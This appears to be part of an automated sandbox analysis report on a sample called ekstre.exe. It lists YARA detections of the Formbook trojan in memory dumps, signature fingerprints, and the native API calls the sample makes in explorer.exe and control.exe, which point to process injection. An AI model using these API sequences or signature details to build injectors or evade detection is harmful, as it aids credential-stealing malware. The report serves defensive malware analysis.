Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.5855696363.000000000A7ED000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: Process Memory Space: ekstre.exe PID: 3348, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: ekstre.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.5855696363.000000000A7ED000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: Process Memory Space: ekstre.exe PID: 3348, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403640

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_00406D5F	0_2_00406D5F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_6DDD2351	0_2_6DDD2351
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_3_36906690	2_3_36906690
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_3_36905C98	2_3_36905C98
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_3_3690620A	2_3_3690620A
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D5232	3_2_0A7D5232
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D4036	3_2_0A7D4036
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7CB082	3_2_0A7CB082
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7CFB30	3_2_0A7CFB30
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7CFB32	3_2_0A7CFB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D2912	3_2_0A7D2912
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7CCD02	3_2_0A7CCD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D85CD	3_2_0A7D85CD
Source: C:\Windows\explorer.exe	Code function: 3_2_121B7232	3_2_121B7232
Source: C:\Windows\explorer.exe	Code function: 3_2_121B1B32	3_2_121B1B32
Source: C:\Windows\explorer.exe	Code function: 3_2_121B1B30	3_2_121B1B30
Source: C:\Windows\explorer.exe	Code function: 3_2_121B6036	3_2_121B6036
Source: C:\Windows\explorer.exe	Code function: 3_2_121AD082	3_2_121AD082
Source: C:\Windows\explorer.exe	Code function: 3_2_121B4912	3_2_121B4912
Source: C:\Windows\explorer.exe	Code function: 3_2_121AED02	3_2_121AED02
Source: C:\Windows\explorer.exe	Code function: 3_2_121BA5CD	3_2_121BA5CD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D8A526	4_2_04D8A526
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7A6C0	4_2_04D7A6C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBC6E0	4_2_04CBC6E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE4670	4_2_04CE4670
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDC600	4_2_04CDC600
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D76757	4_2_04D76757
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCA760	4_2_04CCA760
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC2760	4_2_04CC2760
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB00A0	4_2_04CB00A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D8010E	4_2_04D8010E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCE310	4_2_04CCE310
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD8CDF	4_2_04CD8CDF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D8ACEB	4_2_04D8ACEB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6EC4C	4_2_04D6EC4C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7EC60	4_2_04D7EC60
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D76C69	4_2_04D76C69
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0C12	4_2_04CB0C12
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCAC20	4_2_04CCAC20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3EC20	4_2_04D3EC20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2DB0	4_2_04CD2DB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0D69	4_2_04CC0D69
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2EE8	4_2_04CB2EE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D70EAD	4_2_04D70EAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D02E48	4_2_04D02E48
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE0E50	4_2_04CE0E50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7EFBF	4_2_04D7EFBF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCCF00	4_2_04CCCF00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD6882	4_2_04CD6882
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA6868	4_2_04CA6868
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE810	4_2_04CEE810
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60835	4_2_04D60835
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBE9A0	4_2_04CBE9A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7E9A6	4_2_04D7E9A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7EA5B	4_2_04D7EA5B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7CA13	4_2_04D7CA13
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D34BC0	4_2_04D34BC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0B10	4_2_04CC0B10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2D480	4_2_04D2D480
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D775C6	4_2_04D775C6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7F5C9	4_2_04D7F5C9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7F6F6	4_2_04D7F6F6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D336EC	4_2_04D336EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6D646	4_2_04D6D646
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D5D62C	4_2_04D5D62C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCB0D0	4_2_04CCB0D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D770F1	4_2_04D770F1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF508C	4_2_04CF508C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC51C0	4_2_04CC51C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDB1E0	4_2_04CDB1E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D0717A	4_2_04D0717A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAF113	4_2_04CAF113
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D5D130	4_2_04D5D130
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAD2EC	4_2_04CAD2EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7124C	4_2_04D7124C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDD210	4_2_04CDD210
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB1380	4_2_04CB1380
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7F330	4_2_04D7F330
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDFCE0	4_2_04CDFCE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D47CE8	4_2_04D47CE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D59C98	4_2_04D59C98
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC9DD0	4_2_04CC9DD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D5FDF4	4_2_04D5FDF4
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D77D4C	4_2_04D77D4C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7FD27	4_2_04D7FD27
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D79ED2	4_2_04D79ED2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC1EB2	4_2_04CC1EB2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D71FC6	4_2_04D71FC6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3FF40	4_2_04D3FF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7FF63	4_2_04D7FF63
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D718DA	4_2_04D718DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D778F3	4_2_04D778F3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D398B2	4_2_04D398B2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D35870	4_2_04D35870
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7F872	4_2_04D7F872
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC9870	4_2_04CC9870
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDB870	4_2_04CDB870
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC3800	4_2_04CC3800
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D059C0	4_2_04D059C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7FA89	4_2_04D7FA89
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDFAA0	4_2_04CDFAA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CFDB19	4_2_04CFDB19
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7FB2E	4_2_04D7FB2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2E658	4_2_02B2E658
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B19E50	4_2_02B19E50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B19E4C	4_2_02B19E4C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B12FB0	4_2_02B12FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B12D90	4_2_02B12D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2ED87	4_2_02B2ED87

Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04CF5050 appears 37 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04D2E692 appears 86 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04D3EF10 appears 100 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04D07BE4 appears 97 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04CAB910 appears 257 times

Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D5232 NtCreateFile,	3_2_0A7D5232
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D6E12 NtProtectVirtualMemory,	3_2_0A7D6E12
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D6E0A NtProtectVirtualMemory,	3_2_0A7D6E0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2CF0 NtDelayExecution,LdrInitializeThunk,	4_2_04CF2CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2C30 NtMapViewOfSection,LdrInitializeThunk,	4_2_04CF2C30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_04CF2DC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04CF2D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2E50 NtCreateSection,LdrInitializeThunk,	4_2_04CF2E50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2F00 NtCreateFile,LdrInitializeThunk,	4_2_04CF2F00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF29F0 NtReadFile,LdrInitializeThunk,	4_2_04CF29F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2A80 NtClose,LdrInitializeThunk,	4_2_04CF2A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04CF2BC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2B80 NtCreateKey,LdrInitializeThunk,	4_2_04CF2B80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04CF2B90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2B00 NtQueryValueKey,LdrInitializeThunk,	4_2_04CF2B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04CF2B10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF34E0 NtCreateMutant,LdrInitializeThunk,	4_2_04CF34E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF4570 NtSuspendThread,	4_2_04CF4570
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF4260 NtSetContextThread,	4_2_04CF4260
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2CD0 NtEnumerateKey,	4_2_04CF2CD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2C50 NtUnmapViewOfSection,	4_2_04CF2C50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2C10 NtOpenProcess,	4_2_04CF2C10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2C20 NtSetInformationFile,	4_2_04CF2C20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2DA0 NtReadVirtualMemory,	4_2_04CF2DA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2D50 NtWriteVirtualMemory,	4_2_04CF2D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2EC0 NtQuerySection,	4_2_04CF2EC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2ED0 NtResumeThread,	4_2_04CF2ED0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2E80 NtCreateProcessEx,	4_2_04CF2E80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2EB0 NtProtectVirtualMemory,	4_2_04CF2EB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2E00 NtQueueApcThread,	4_2_04CF2E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2FB0 NtSetValueKey,	4_2_04CF2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2F30 NtOpenDirectoryObject,	4_2_04CF2F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF29D0 NtWaitForSingleObject,	4_2_04CF29D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2AC0 NtEnumerateValueKey,	4_2_04CF2AC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2AA0 NtQueryInformationFile,	4_2_04CF2AA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2A10 NtWriteFile,	4_2_04CF2A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2BE0 NtQueryVirtualMemory,	4_2_04CF2BE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2B20 NtQueryInformationProcess,	4_2_04CF2B20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF3C90 NtOpenThread,	4_2_04CF3C90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF3C30 NtOpenProcessToken,	4_2_04CF3C30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF38D0 NtGetContextThread,	4_2_04CF38D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A350 NtCreateFile,	4_2_02B2A350
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A480 NtClose,	4_2_02B2A480
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A400 NtReadFile,	4_2_02B2A400
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A530 NtAllocateVirtualMemory,	4_2_02B2A530
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A3FA NtReadFile,	4_2_02B2A3FA
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A34A NtCreateFile,	4_2_02B2A34A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2A52A NtAllocateVirtualMemory,	4_2_02B2A52A

Source: api-ms-win-core-console-l1-2-0.dll.0.dr

